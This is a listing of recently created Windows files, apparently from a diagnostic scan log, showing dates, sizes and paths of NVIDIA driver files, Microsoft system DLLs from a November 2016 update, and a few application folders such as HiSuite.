2016-11-19 03:13 - 2016-11-17 03:06 - 00644112 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00572888 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00438208 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00394888 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00390200 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00327408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2016-11-19 03:13 - 2016-11-17 03:06 - 00042296 _____ C:\WINDOWS\system32\nvinfo.pb
2016-11-19 03:13 - 2016-11-17 03:06 - 00000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2016-11-19 03:13 - 2016-11-17 03:06 - 00000669 _____ C:\WINDOWS\system32\nv-vk64.json
2016-11-19 03:02 - 2005-01-22 01:53 - 00055296 _____ C:\WINDOWS\system32\huffyuv.dll
2016-11-18 22:48 - 2016-11-18 22:48 - 00001067 _____ C:\Users\Public\Desktop\HiSuite.lnk
2016-11-18 22:48 - 2016-11-18 22:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HiSuite
2016-11-18 22:48 - 2016-11-18 22:48 - 00000000 ____D C:\Program Files (x86)\HiSuite
2016-11-18 14:42 - 2016-11-18 14:42 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2016-11-18 14:42 - 2016-10-25 21:21 - 00106040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2016-11-18 14:42 - 2016-10-25 21:21 - 00095800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2016-11-16 06:45 - 2016-12-03 19:37 - 00000000 ____D C:\Users\Patrick\AppData\LocalLow\Mozilla
2016-11-13 23:20 - 2016-11-13 23:20 - 00000000 ____D C:\ProgramData\Adventure Game Studio
2016-11-10 06:45 - 2016-11-02 12:09 - 02257104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-11-10 06:45 - 2016-11-02 12:04 - 00596832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2016-11-10 06:45 - 2016-11-02 12:01 - 01425000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9.dll
2016-11-10 06:45 - 2016-11-02 12:01 - 01263856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-11-10 06:45 - 2016-11-02 12:01 - 00276832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\input.dll
2016-11-10 06:45 - 2016-11-02 11:48 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSpkg.dll
2016-11-10 06:45 - 2016-11-02 11:46 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-11-10 06:45 - 2016-11-02 11:43 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d8.dll
2016-11-10 06:45 - 2016-11-02 11:42 - 00632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sud.dll
2016-11-10 06:45 - 2016-11-02 11:42 - 00549376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActionCenterCPL.dll
2016-11-10 06:45 - 2016-11-02 11:42 - 00506880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2016-11-10 06:45 - 2016-11-02 11:42 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-11-10 06:45 - 2016-11-02 11:40 - 00548352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ddraw.dll
2016-11-10 06:45 - 2016-11-02 11:31 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2016-11-10 06:45 - 2016-11-02 11:31 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-11-10 06:45 - 2016-11-02 11:29 - 07469056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-11-10 06:45 - 2016-11-02 11:29 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2016-11-10 06:45 - 2016-11-02 11:28 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-11-10 06:45 - 2016-11-02 11:27 - 02458112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themecpl.dll
2016-11-10 06:45 - 2016-11-02 11:27 - 00580608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hgcpl.dll
2016-11-10 06:45 - 2016-11-02 11:26 - 01595392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-11-10 06:45 - 2016-11-02 11:26 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-11-10 06:45 - 2016-11-02 11:26 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\stobject.dll
2016-11-10 06:45 - 2016-11-02 11:25 - 02256384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-11-10 06:44 - 2016-11-02 12:22 - 01570672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-11-10 06:44 - 2016-11-02 12:22 - 00601712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2016-11-10 06:44 - 2016-11-02 12:12 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-11-10 06:44 - 2016-11-02 12:08 - 00602464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-11-10 06:44 - 2016-11-02 12:08 - 00111968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-11-10 06:44 - 2016-11-02 12:05 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-11-10 06:44 - 2016-11-02 12:05 - 06657176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-11-10 06:44 - 2016-11-02 12:05 - 03892352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-11-10 06:44 - 2016-11-02 12:05 - 00951904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-11-10 06:44 - 2016-11-02 11:50 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-11-10 06:44 - 2016-11-02 11:49 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2016-11-10 06:44 - 2016-11-02 11:47 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
2016-11-10 06:44 - 2016-11-02 11:47 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Shell.Search.UriHandler.dll
2016-11-10 06:44 - 2016-11-02 11:45 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
2016-11-10 06:44 - 2016-11-02 11:45 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll
2016-11-10 06:44 - 2016-11-02 11:44 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-11-10 06:44 - 2016-11-02 11:44 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthExt.dll
2016-11-10 06:44 - 2016-11-02 11:43 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-11-10 06:44 - 2016-11-02 11:43 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll
2016-11-10 06:44 - 2016-11-02 11:42 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2016-11-10 06:44 - 2016-11-02 11:42 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2016-11-10 06:44 - 2016-11-02 11:41 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2016-11-10 06:44 - 2016-11-02 11:39 - 00465920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2016-11-10 06:44 - 2016-11-02 11:39 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\zipfldr.dll
2016-11-10 06:44 - 2016-11-02 11:39 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAnimation.dll
2016-11-10 06:44 - 2016-11-02 11:38 - 00760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2016-11-10 06:44 - 2016-11-02 11:36 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-11-10 06:44 - 2016-11-02 11:35 - 00336896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2016-11-10 06:44 - 2016-11-02 11:33 - 12349952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-11-10 06:44 - 2016-11-02 11:33 - 03307520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-11-10 06:44 - 2016-11-02 11:29 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-11-10 06:44 - 2016-11-02 11:29 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSM.dll
2016-11-10 06:44 - 2016-11-02 11:28 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-11-10 06:44 - 2016-11-02 11:28 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.OnlineId.dll
2016-11-10 06:44 - 2016-11-02 11:27 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2016-11-10 06:44 - 2016-11-02 11:26 - 02747392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
2016-11-10 06:44 - 2016-11-02 11:26 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-11-10 06:44 - 2016-11-02 11:26 - 00912896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2016-11-10 06:44 - 2016-11-02 11:26 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-11-10 06:44 - 2016-11-02 11:26 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2016-11-10 06:44 - 2016-11-02 11:25 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-11-10 06:44 - 2016-11-02 11:25 - 01556480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2016-11-10 06:44 - 2016-11-02 11:25 - 00772608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntshrui.dll
2016-11-10 06:44 - 2016-11-02 11:23 - 03106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2016-11-10 06:44 - 2016-11-02 11:23 - 02356736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVidCtl.dll
2016-11-10 06:44 - 2016-08-02 05:30 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-11-10 06:43 - 2016-11-02 13:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-11-10 06:43 - 2016-11-02 13:01 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-11-10 06:43 - 2016-11-02 12:10 - 02323728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2016-11-10 06:43 - 2016-11-02 12:08 - 00576408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-11-10 06:43 - 2016-11-02 12:08 - 00186424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\weretw.dll
2016-11-10 06:43 - 2016-11-02 12:05 - 00959112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-11-10 06:43 - 2016-11-02 12:04 - 04312248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-11-10 06:43 - 2016-11-02 12:01 - 01415744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2016-11-10 06:43 - 2016-11-02 12:01 - 00545936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-11-10 06:43 - 2016-11-02 11:49 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-11-10 06:43 - 2016-11-02 11:48 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2016-11-10 06:43 - 2016-11-02 11:48 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efsext.dll
2016-11-10 06:43 - 2016-11-02 11:47 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2016-11-10 06:43 - 2016-11-02 11:46 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppCapture.dll
2016-11-10 06:43 - 2016-11-02 11:45 - 00492032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2016-11-10 06:43 - 2016-11-02 11:44 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2016-11-10 06:43 - 2016-11-02 11:43 - 00270336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2016-11-10 06:43 - 2016-11-02 11:43 - 00126464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2016-11-10 06:43 - 2016-11-02 11:42 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2016-11-10 06:43 - 2016-11-02 11:40 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontext.dll
2016-11-10 06:43 - 2016-11-02 11:40 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-11-10 06:43 - 2016-11-02 11:37 - 19415040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-11-10 06:43 - 2016-11-02 11:36 - 19415552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-11-10 06:43 - 2016-11-02 11:36 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ErrorDetailsUpdate.dll
2016-11-10 06:43 - 2016-11-02 11:31 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2016-11-10 06:43 - 2016-11-02 11:30 - 12175360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-11-10 06:43 - 2016-11-02 11:30 - 00134144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ErrorDetails.dll
2016-11-10 06:43 - 2016-11-02 11:29 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2016-11-10 06:43 - 2016-11-02 11:28 - 04423680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-11-10 06:43 - 2016-11-02 11:28 - 00109568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chartv.dll
2016-11-10 06:43 - 2016-11-02 11:26 - 02484736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gameux.dll
2016-11-10 06:43 - 2016-11-02 11:23 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GlobCollationHost.dll
2016-11-10 06:43 - 2016-11-02 10:11 - 00788624 _____ C:\WINDOWS\SysWOW64\locale.nls
2016-11-10 06:43 - 2016-11-02 10:11 - 00788624 _____ C:\WINDOWS\system32\locale.nls
2016-11-10 06:36 - 2016-11-02 12:14 - 07816544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-11-10 06:36 - 2016-11-02 12:13 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-11-10 06:36 - 2016-11-02 12:13 - 00773720 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2016-11-10 06:36 - 2016-11-02 12:13 - 00423776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe
2016-11-10 06:36 - 2016-11-02 12:12 - 02255712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-11-10 06:36 - 2016-11-02 12:05 - 00405856 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-11-10 06:36 - 2016-11-02 12:01 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-11-10 06:36 - 2016-11-02 12:00 - 22223968 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-11-10 06:36 - 2016-11-02 12:00 - 08156080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-11-10 06:36 - 2016-11-02 11:56 - 01418312 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-11-10 06:36 - 2016-11-02 11:56 - 00322912 _____ (Microsoft Corporation) C:\WINDOWS\system32\input.dll
2016-11-10 06:36 - 2016-11-02 11:34 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-11-10 06:36 - 2016-11-02 11:34 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-11-10 06:36 - 2016-11-02 11:33 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-11-10 06:36 - 2016-11-02 11:31 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSpkg.dll
2016-11-10 06:36 - 2016-11-02 11:30 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-11-10 06:36 - 2016-11-02 11:30 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
2016-11-10 06:36 - 2016-11-02 11:30 - 00321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-11-10 06:36 - 2016-11-02 11:30 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll
2016-11-10 06:36 - 2016-11-02 11:29 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2016-11-10 06:36 - 2016-11-02 11:29 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-11-10 06:36 - 2016-11-02 11:28 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-11-10 06:36 - 2016-11-02 11:28 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2016-11-10 06:36 - 2016-11-02 11:28 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2016-11-10 06:36 - 2016-11-02 11:28 - 00240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-11-10 06:36 - 2016-11-02 11:27 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-11-10 06:36 - 2016-11-02 11:27 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2016-11-10 06:36 - 2016-11-02 11:27 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2016-11-10 06:36 - 2016-11-02 11:26 - 00388608 _____ (Microsoft Corporation) C:\WINDOWS\system32\zipfldr.dll
2016-11-10 06:36 - 2016-11-02 11:26 - 00273920 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAnimation.dll
2016-11-10 06:36 - 2016-11-02 11:26 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-11-10 06:36 - 2016-11-02 11:25 - 00655872 _____ (Microsoft Corporation) C:\WINDOWS\system32\sud.dll
2016-11-10 06:36 - 2016-11-02 11:25 - 00541696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-11-10 06:36 - 2016-11-02 11:25 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.UserAccountsHandlers.dll
2016-11-10 06:36 - 2016-11-02 11:23 - 02104320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2016-11-10 06:36 - 2016-11-02 11:22 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-11-10 06:36 - 2016-11-02 11:19 - 08127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-11-10 06:36 - 2016-11-02 11:19 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-11-10 06:36 - 2016-11-02 11:19 - 00981504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2016-11-10 06:36 - 2016-11-02 11:19 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-11-10 06:36 - 2016-11-02 11:18 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\shdocvw.dll
2016-11-10 06:36 - 2016-11-02 11:17 - 04746752 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-11-10 06:36 - 2016-11-02 11:17 - 01282048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-11-10 06:36 - 2016-11-02 11:17 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-11-10 06:36 - 2016-11-02 11:17 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\system32\stobject.dll
2016-11-10 06:36 - 2016-11-02 11:16 - 04148736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-11-10 06:36 - 2016-11-02 11:16 - 03133440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
2016-11-10 06:36 - 2016-11-02 11:16 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-11-10 06:36 - 2016-11-02 11:16 - 02512384 _____ (Microsoft Corporation) C:\WINDOWS\system32\themecpl.dll
2016-11-10 06:36 - 2016-11-02 11:16 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2016-11-10 06:36 - 2016-11-02 11:15 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-11-10 06:36 - 2016-11-02 11:15 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-11-10 06:36 - 2016-11-02 11:15 - 01348608 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-11-10 06:36 - 2016-11-02 11:15 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2016-11-10 06:36 - 2016-11-02 11:15 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.dll
2016-11-10 06:36 - 2016-11-02 11:14 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-11-10 06:36 - 2016-11-02 11:13 - 03496960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll
2016-11-10 06:36 - 2016-11-02 11:13 - 03299840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2016-11-10 06:36 - 2016-11-02 09:20 - 00446896 _____ C:\WINDOWS\system32\ApnDatabase.xml
2016-11-10 06:35 - 2016-11-02 12:20 - 00378720 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-11-10 06:35 - 2016-11-02 12:15 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-11-10 06:35 - 2016-11-02 12:15 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-11-10 06:35 - 2016-11-02 12:13 - 01354320 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-11-10 06:35 - 2016-11-02 12:13 - 01173496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-11-10 06:35 - 2016-11-02 12:12 - 00376672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2016-11-10 06:35 - 2016-11-02 12:04 - 02678056 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2016-11-10 06:35 - 2016-11-02 12:03 - 02750936 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-11-10 06:35 - 2016-11-02 12:02 - 00848736 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-11-10 06:35 - 2016-11-02 12:02 - 00682816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-11-10 06:35 - 2016-11-02 12:02 - 00238056 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2016-11-10 06:35 - 2016-11-02 12:02 - 00148832 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-11-10 06:35 - 2016-11-02 12:00 - 04130432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-11-10 06:35 - 2016-11-02 12:00 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-11-10 06:35 - 2016-11-02 12:00 - 01061968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-11-10 06:35 - 2016-11-02 11:59 - 04673304 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-11-10 06:35 - 2016-11-02 11:56 - 01609920 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9.dll
2016-11-10 06:35 - 2016-11-02 11:56 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2016-11-10 06:35 - 2016-11-02 11:56 - 00628552 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-11-10 06:35 - 2016-11-02 11:55 - 00048992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\iorate.sys
2016-11-10 06:35 - 2016-11-02 11:38 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-11-10 06:35 - 2016-11-02 11:32 - 00045056 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-11-10 06:35 - 2016-11-02 11:32 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\efsext.dll
2016-11-10 06:35 - 2016-11-02 11:31 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2016-11-10 06:35 - 2016-11-02 11:31 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-11-10 06:35 - 2016-11-02 11:31 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-11-10 06:35 - 2016-11-02 11:30 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2016-11-10 06:35 - 2016-11-02 11:30 - 00567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2016-11-10 06:35 - 2016-11-02 11:30 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\dab.dll
2016-11-10 06:35 - 2016-11-02 11:29 - 00336896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll
2016-11-10 06:35 - 2016-11-02 11:29 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2016-11-10 06:35 - 2016-11-02 11:29 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-11-10 06:35 - 2016-11-02 11:29 - 00276992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2016-11-10 06:35 - 2016-11-02 11:29 - 00139264 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActionCenterCPL.dll
2016-11-10 06:35 - 2016-11-02 11:28 - 00432128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
